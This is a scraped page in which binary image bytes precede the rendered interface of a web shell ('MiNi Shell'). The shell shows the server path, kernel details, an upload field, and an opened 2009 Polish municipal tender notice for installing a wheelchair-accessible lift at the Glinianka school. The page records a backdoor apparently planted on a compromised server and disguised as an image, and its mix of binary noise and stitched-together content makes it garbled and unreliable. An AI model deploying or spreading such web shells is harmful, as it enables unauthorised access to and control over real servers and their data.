JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090710/233388-N-2009.html

<p class="kh_header"><b>Wiązowna: Dostawa i montaż windy osobowejdostosowanej dla potrzeb osób niepełnosprawnych w Gimnazjum w Gliniance</b><br>
<b>Numer ogłoszenia: 233388 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiązowna , ul. Lubelska 59, 05-462 Wiązowna, woj. mazowieckie, tel. 022 7890128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> urzad@wiazowna.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż windy osobowejdostosowanej dla potrzeb osób niepełnosprawnych w Gimnazjum w Gliniance.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia:                                          Zamówienie obejmuje dostawę i montaż windy osobowej przystosowanej dla osób niepełnosprawnych w budynku Gimnazjum w Gliniance, przy ul. Napoleońskiej 57A . Wykonawca zabezpieczy miejsce pracy w sposób nie kolidujący z pracą szkoły i zapewniający całkowite bezpieczeństwo uczniom i personelowi szkoły. Wykonawca w ramach zamówienia przyjmie do wykonania:                                                                                           1. Wykonanie dokumentacji projektowo-montażowej, w oparciu o przekrój pionowy i poziomy przez szyb i maszynownię,                                                                                                                    2. Przygotowanie szybu windowego poprzez: wybicie zamurowanych otworów drzwiowych i ich poszerzenie do wymaganych wymiarów114x225cm, zamontowanie nadproży ,tak aby uzyskać po zamontowaniu windy otwór o szerokości 900mm, uzupełnienie brakujących tynków w szybie windowym,                                                                                                                                         3. Dostawę windy wraz z oprzyrządowaniem na miejsce montażu,                                                4. Montaż ,                                                                                                                                         5. Sporządzenie dokumentacji do rejestracji w Urzędzie Dozoru Technicznego i zatwierdzenie,                                                                                                                  6. Dopuszczenie do eksploatacji,                                                                                                      7. Wykonanie prób, odbioru i rozruchu urządzenia dźwigowego z udziałem wymaganych instytucji, w tym Urzędu Dozoru Technicznego i Zamawiającego,                                                 8. Rejestracje windy w Urzędzie Dozoru Technicznego,                                                                   9. Dostarczenie dokumentacji technicznej dźwigu (DTR) z instrukcją obsługi, konserwacji i eksploatacji w języku polskim,                                                                                                             10. Przeszkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji dźwigu.             Dane dotyczące windy osobowej przystosowanej dla osób niepełnosprawnych:                                  - Winda musi posiadać wymiary pozwalające na zamontowanie jej w szybie o wymiarach
   1800mmx1700mm.                                                                                                                             - Nadszybie - 3600mm.
- Podszybie  -1300mm                                                                                                                         - Ilość przystanków - 3.
- Maszynownia boczna.                                                                                                                Winda musi spełniać następujące parametry techniczne: typ dźwigu- osobowy, udźwig 630kg, prędkość 0,5 m/s, hydrauliczny przystosowany dla osób niepełnosprawnych na wózkach inwalidzkich, napęd hydrauliczny, kabina- nieprzelotowa w konstrukcji stalowej adaptowana pod potrzeby wygodnego użytkowania przez osoby niepełnosprawne, podłoga- wykładzina antypoślizgowa, panel dyspozycyjny z przyciskami w wykonaniu antywandalowym, drzwi szybowe automatyczne ze stali..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.   Oferta winna być zabezpieczona wadium w wysokości 3.000 zł (słownie: 
     trzy tysiące złotych). 
     2. Wadium musi być wniesione przed upływem terminu składania ofert. Wadium 
         może być wniesione w jednej lub kilku następujących formach:              
     1) pieniądzu przelewem na konto sum depozytowych Urzędu Gminy Wiązowna,     
           ul. Lubelska  59  ,Nr:  59 8001 0005 2003 0020 0592 0012  B.S. w 
          Otwocku  O/ w Wiązownie,
       2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
            oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze 
           poręczeniem pieniężnym,
       3) gwarancjach bankowych,
       4) gwarancjach ubezpieczeniowych;
       5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt  
           2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
           Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz.275).
  3. Oryginał dowodu wniesienia wadium proszę złożyć w pok. 102 (I piętro Urzędu  
     Gminy Wiązowna), natomiast kopię należy dołączyć do złożonej oferty. 
  4. Zamawiający zwraca niezwłocznie wadium jeżeli:
     1) upłynął termin związania ofertą,
     2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
         należytego wykonania tej umowy,

    3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty 
        zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
    4) zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
- który wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
- którego oferta została odrzucona.                                                                                                                                        5) Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym 
    zwrócono wadium na podstawie wykluczenia z postępowania , którego oferta 
    została odrzucona, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu 
    unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. 
    Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego. Jeżeli 
    wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami 
    wynikającymi z umowy rachunku bankowego, na którym było ono  
    przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz  
    prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
    wykonawcę.                                                                                                     6) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w  
    odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo 
    zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa  
    w art. 25 ust. 1 ustawy p.z.p. lub pełnomocnictw, chyba że udowodni , że wynika 
    to z przyczyn nieleżących po jego stronie.
   5. Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z 
       postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się 
       przez  Wykonawcę prawa do wniesienia protestu.   
   6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego 
       oferta  została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujące warunki:                                                                                                                1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, aktualny wpis do właściwego rejestru lub ewidencji działalności gospodarczej zgodny z charakterem zamówienia,                                                                                                          2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,                                                                          - zrealizowali w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 3 dostawy wraz z montażem wind (dźwigów) osobowych przystosowanych dla osób niepełnosprawnych odpowiadające swoją wartością dostawom stanowiącym przedmiot zamówienia oraz wykażą że zostały one wykonane należycie.,                                                                                                            3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia                                                                                                                    - posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności,                                                                                                            4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 Prawa zamówień publicznych.                                                                                                      5) oferują dostawę i montaż objęte zamówieniem, spełniające wymagania określone przez Zamawiającego.                                                                                                                                2. Z ubiegania się o zamówienie publiczne wyklucza się Wykonawców, którzy:                               1) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 Prawo zamówień publicznych,                                                                                                                          2) podlegają wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 Prawo zamówień publicznych                                                                                                                                       3. Zamawiający odrzuca ofertę, jeżeli:                                                                                                          1) jest niezgodna z ustawą,                                                                                                                      2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust.2 pkt.3 Prawo Zamówień publicznych,                                                                                                                                           3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;                                                                                                                  4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;                                           5) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o 
udzielenie zamówienia,                                                                                                                                            6) zawiera błędy w obliczeniu ceny,                                                                                                       7) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3 Prawa zamówień publicznych.                                  8) jest nieważna na podstawie odrębnych przepisów.                                                                        4. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą                                                       5. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego- (spełnia- nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu, o których mowa w rozdziale V ust.1 mają dostarczyć:                                                                  1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                                                                          2) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków oraz opłat lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert.                                                                              3) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne    i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.                                                                 4) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych (wg. Załącznika nr 4 do SIWZ).                                                                             5) Wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 2 dostawy wraz z montażem wind (dźwigów) osobowych,odpowiadające swoją wartością dostawom stanowiącym przedmiot zamówienia oraz wykażą, że zostały one wykonane należycie (wg. Załącznik nr 3 do SIWZ).                                                                               6) Polisę ubezpieczeniową lub inny dokument potwierdzający ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności.                                                  2. Wykonawca zamieszkały poza terytorium Rzeczpospolitej Polskiej                                        1) Zamiast dokumentów, o których mowa w ust. 1 pkt. 1, 3 i 4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:                                                                                            a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,                                                                        b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne             i zdrowotne albo uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem składania ofert.                                                                               2) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w punkcie 1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania- wystawionych nie wcześniej niż w terminach określonych w pkt.3.                                                                                                        3.Postanowienia dotyczące składanych dokumentów:                                                             1) Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę -osoby uprawnione do podpisania oferty z dopiskiem (za zgodność z oryginałem). Jeżeli dokument składany w formie kserokopii składa się z więcej niż jednej strony, każda ze stron musi być potwierdzona za zgodność z oryginałem.                                                                             2) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.                                                                                 4. Dokumenty wymagane w przypadku składania oferty wspólnej:                                              1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.                                                                                                                                 2) Oferta winna zawierać: oświadczenia i dokumenty opisane w ust. 1 pkt.1, 3-5 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.                                       5. Spółka cywilna jest kwalifikowana jako Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.                                                                                                         6. Na ofertę składają się:                                                                                                        1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę (wg. Załącznika nr 1 do SIWZ).                                                                                                                            2) Wykaz części zamówienia, której wykonanie zostanie powierzone Podwykonawcom - jeżeli Wykonawca zamierza powierzyć wykonanie zamówienia Podwykonawcom .                                                                                                                                                                                                                                                                                                                                                                                      3) Oświadczenie, że Wykonawca w okresie gwarancji zapewnia bezpłatne wykonanie napraw gwarancyjnych urządzenia dźwigowego w maksymalnym czasie 24 godziny od chwili zgłoszenia telefonicznego awarii przez Zamawiającego.                                                                                            7. Wykonawca wraz z ofertą składa wszystkie wymagane dokumenty i oświadczenia, o których mowa w treści specyfikacji, potwierdzające spełnienia warunków udziału w postępowaniu.                                                                                                                             8. Niedostarczenie któregokolwiek z wymaganych w niniejszej specyfikacji dokumentów spowoduje wykluczenie Wykonawcy lub odrzucenie oferty, z zastrzeżeniem art.26 ust. 3 Prawa zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.wiazowna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wiązowna  ul. Lubelska 59, 05-462 Wiązowna.IIp. pokój 209.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2009 godzina 10:30, miejsce: Urząd Gminy Wiązowna, ul. Lubelska 59, 05-462 Wiązowna, parter, Biuro Obsługi Mieszkańca.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com